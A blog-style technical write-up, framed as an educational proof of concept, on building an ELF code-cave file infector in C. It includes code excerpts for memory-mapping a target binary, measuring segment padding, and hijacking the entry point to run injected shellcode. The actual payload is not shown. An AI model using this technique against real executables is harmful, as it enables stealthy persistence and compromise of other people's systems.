Deep Dive: Writing an ELF Code Cave Infector in C

JustThinkingHard
Cybersecurity student | Low level enjoyer

Disclaimer: This tool is a Proof of Concept (PoC) for educational purposes only.

Understanding how Linux executables work under the hood is one of the best ways to understand system security. In this project, I built a “Code Cave Injector”: a tool that hides a payload inside an existing binary without changing its file size.

Here is a breakdown of how my Infektor tool works, referencing the source code.

The Concept: What is a “Code Cave”?

When a toolchain (like GCC and its linker) builds a program, the linker groups the code and data into Segments. Because the kernel maps files and applies memory permissions one page at a time, these segments are aligned to Page Boundaries (usually 4096 bytes / 0x1000).

Because code rarely fits exactly into these 4096-byte blocks, there is often empty space (padding) filled with zeros at the end of the executable segment. This gap is called a Code Cave.
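To make the arithmetic concrete, here is a minimal sketch of how much padding is left when a segment ends partway through a page. The helper name padding_to_next_page and the sample offset are assumptions for illustration, not part of the tool.

```c
#include <stddef.h>

/* Hypothetical helper: number of bytes between end_offset and the next
 * page boundary. page_size must be a power of two (e.g. 0x1000). */
size_t padding_to_next_page(size_t end_offset, size_t page_size)
{
    /* Bytes already used inside the last, partially filled page */
    size_t used_in_last_page = end_offset & (page_size - 1);

    /* An offset that sits exactly on a boundary leaves no padding */
    return used_in_last_page == 0 ? 0 : page_size - used_in_last_page;
}
```

For a segment whose file data ends at offset 0x1234 with 0x1000-byte pages, this gives 0xdcc (3532) bytes. This is only an upper-bound intuition: the real gap depends on where the next segment actually starts in the file, which is why the tool measures it from the program headers.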

[Figure: ELF structure diagram, visualizing the gaps between segments in an ELF file.]

My tool finds this gap and inserts shellcode into it.

Key Implementation Details

The injector performs three main tasks:

  1. Map the target binary into memory.
  2. Find a suitable gap (Code Cave) in the executable segment.
  3. Inject the payload and hijack the Entry Point.
  • 1. Memory Mapping (mmap)

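    Instead of using standard read/write calls, I used mmap. This maps the file directly into the program’s virtual memory space. Because of the MAP_SHARED flag, any change I make to the memory array file[] is carried through to the file itself: the kernel writes the modified pages back to disk (msync can force this at a specific point). The file descriptor must be opened read-write for a writable shared mapping to succeed.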

    unsigned char *file = mmap(
        NULL,
        size,
        PROT_READ | PROT_WRITE,
        MAP_SHARED, // Writes sync back to the file
        fd,
        0
    );
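As a small, self-contained illustration of the MAP_SHARED behaviour described above, the sketch below overwrites a single byte of an arbitrary file through a mapping. The function name patch_byte_via_mmap and its error handling are assumptions made for this example, not code from the tool.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: overwrite one byte of a file through a shared mapping.
 * Returns 0 on success, -1 on failure. */
int patch_byte_via_mmap(const char *path, size_t offset, unsigned char value)
{
    /* Read-write access is required for PROT_WRITE with MAP_SHARED */
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;

    /* The mapping length comes from the current file size */
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size <= 0 || offset >= (size_t)st.st_size) {
        close(fd);
        return -1;
    }
    size_t size = (size_t)st.st_size;

    unsigned char *file = mmap(NULL, size, PROT_READ | PROT_WRITE,
                               MAP_SHARED, fd, 0);
    close(fd); /* the mapping stays valid after the descriptor is closed */
    if (file == MAP_FAILED)
        return -1;

    file[offset] = value; /* an ordinary memory write into the mapping */

    /* Flush the dirty page to the file now instead of waiting for the kernel */
    int rc = msync(file, size, MS_SYNC);
    if (munmap(file, size) < 0)
        rc = -1;
    return rc;
}
```

Checking the mmap result against MAP_FAILED (not NULL) matters here, since that is the value mmap returns on error.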
  • 2. The Safety Check (calculate_gap)

    This is the most critical part of the code. If we blindly inject code, we might overwrite the start of the next segment (the one holding sections like .rodata or .data), crashing the program.

    I implemented a function calculate_gap that looks at the PT_LOAD segment headers to measure exactly how much space exists before the next segment starts.

    size_t calculate_gap(Elf64_Phdr *target, Elf64_Phdr *all_hdrs, int count, size_t file_size)
    {
        Elf64_Off target_end = target->p_offset + target->p_filesz;
        Elf64_Off nearest_next_start = file_size;

        // A segment that claims to end past the end of the file has no usable gap
        // (this also prevents the subtraction below from wrapping around)
        if (target_end > file_size) {
            return 0;
        }

        // Scan all headers to find the one that starts closest after our target
        for (int i = 0; i < count; i++) {
            Elf64_Off current_start = all_hdrs[i].p_offset;
            if (current_start >= target_end && current_start < nearest_next_start) {
                nearest_next_start = current_start;
            }
        }

        // Bytes between the end of the target's file data and the next header's data
        return nearest_next_start - target_end;
    }

    If size_payload > available_gap, the tool aborts with a CRITICAL ERROR, so the payload can never spill into bytes that belong to another segment.
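The post does not show how the target header passed to calculate_gap is chosen. One plausible approach, sketched here under that assumption, is to pick the first PT_LOAD segment with the execute flag set. The helper name find_exec_segment is hypothetical, and the example assumes a Linux system that provides <elf.h>.

```c
#include <elf.h>
#include <stddef.h>

/* Hypothetical helper: return the first loadable segment that has the
 * execute flag set, or NULL if the table contains none. */
Elf64_Phdr *find_exec_segment(Elf64_Phdr *hdrs, int count)
{
    for (int i = 0; i < count; i++) {
        /* Only PT_LOAD entries are mapped into memory by the loader */
        if (hdrs[i].p_type == PT_LOAD && (hdrs[i].p_flags & PF_X))
            return &hdrs[i];
    }
    return NULL;
}
```

The returned pointer could then be handed to calculate_gap as its target argument, with the full header table and e_phnum as the other inputs.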

  • 3. Hijacking Execution (infection)

    Once the space is confirmed, the injection happens.

    1. Copy Payload: I copy the shellcode to the end of the text segment.

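    2. Patch Return Address: When the payload finishes, it has to jump back to the program’s original entry point so the user doesn’t notice anything. I calculate jt_offset (the position of the jump_target variable relative to the start of the shellcode) and overwrite that slot in the copied payload with the original e_entry value.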

    3. Update Entry Point: Finally, I modify the ELF Header (e_entry) to point to my new code location (payload_va).

    int infection(int fd, Elf64_Ehdr *ehdr, Elf64_Phdr *phdr, unsigned char *file)
    {
        // ... logic to calculate offsets ...
    
        // Patch the payload with the original entry point
        memcpy(payload_dst + jt_offset, &original_entry, sizeof(Elf64_Addr));
    
        // Hijack the binary entry point
        ehdr->e_entry = payload_va;
    
        // Officially extend the segment size to include the payload
        phdr->p_filesz += size;
        phdr->p_memsz += size;
    
        return 0;
    }
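The offset logic is elided in the listing above, and this sketch does not try to reconstruct it. It only illustrates the general relationship between file offsets and virtual addresses inside a PT_LOAD segment, which is vaddr = p_vaddr + (offset - p_offset). The helper name offset_to_vaddr is hypothetical and is not necessarily how payload_va is computed in the tool.

```c
#include <elf.h>

/* Hypothetical helper: translate a file offset that lies inside seg into the
 * virtual address it is loaded at. An offset equal to the end of the segment's
 * file data (the first byte after it) is accepted as well.
 * Returns 0 and stores the address in *out, or returns -1 if the offset is
 * outside that range. */
int offset_to_vaddr(const Elf64_Phdr *seg, Elf64_Off offset, Elf64_Addr *out)
{
    if (offset < seg->p_offset || offset > seg->p_offset + seg->p_filesz)
        return -1;

    /* Same distance from the start of the segment, in file and in memory */
    *out = seg->p_vaddr + (offset - seg->p_offset);
    return 0;
}
```

For a segment with p_offset 0x1000, p_vaddr 0x401000 and p_filesz 0x234, the first byte after the segment's file data (offset 0x1234) corresponds to address 0x401234.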

Linking C and Assembly

One interesting challenge was linking the C injector with the Assembly payload. I used extern symbols to access labels defined in the .s file directly from C.

extern unsigned char payload_start;
extern unsigned long jump_target;

This allows the C code to measure the payload size dynamically and know exactly where to patch the jump addresses.
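The pattern can be tried in a single file with placeholder data. In the sketch below, a top-level asm block stands in for the separate .s file and contains only zero bytes, not a real payload. All demo_* names, including the demo_end label used to measure the size, are assumptions for illustration, and the example assumes GCC or Clang targeting 64-bit ELF (Linux).

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in for a separate .s file: 8 placeholder bytes followed by an
 * 8-byte slot, bracketed by global labels. Placed in .data so the slot is
 * writable in this demo. */
__asm__(
    ".pushsection .data\n"
    ".balign 8\n"
    ".globl demo_start\n"
    "demo_start:\n"
    "    .zero 8\n"
    ".globl demo_jump_target\n"
    "demo_jump_target:\n"
    "    .quad 0\n"
    ".globl demo_end\n"
    "demo_end:\n"
    ".popsection\n"
);

/* The labels are visible to C as ordinary external symbols; only their
 * addresses are meaningful for the start and end markers. */
extern unsigned char demo_start;
extern unsigned long demo_jump_target;
extern unsigned char demo_end;

/* Total size of the blob, measured between the two marker labels */
size_t demo_blob_size(void)
{
    return (size_t)((uintptr_t)&demo_end - (uintptr_t)&demo_start);
}

/* Offset of the patchable slot relative to the start of the blob */
size_t demo_jump_target_offset(void)
{
    return (size_t)((uintptr_t)&demo_jump_target - (uintptr_t)&demo_start);
}
```

With this layout the blob is 16 bytes long and the slot sits at offset 8. An offset computed this way is presumably what jt_offset represents in the injector, since it stays valid after the bytes are copied elsewhere.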

Conclusion

This project was a deep dive into the ELF file format. By manipulating Elf64_Phdr structures directly, I learned how the OS loader parses binaries. The result is a stealthy persistence mechanism that leaves the file size unchanged on the disk (ls -l shows no difference!).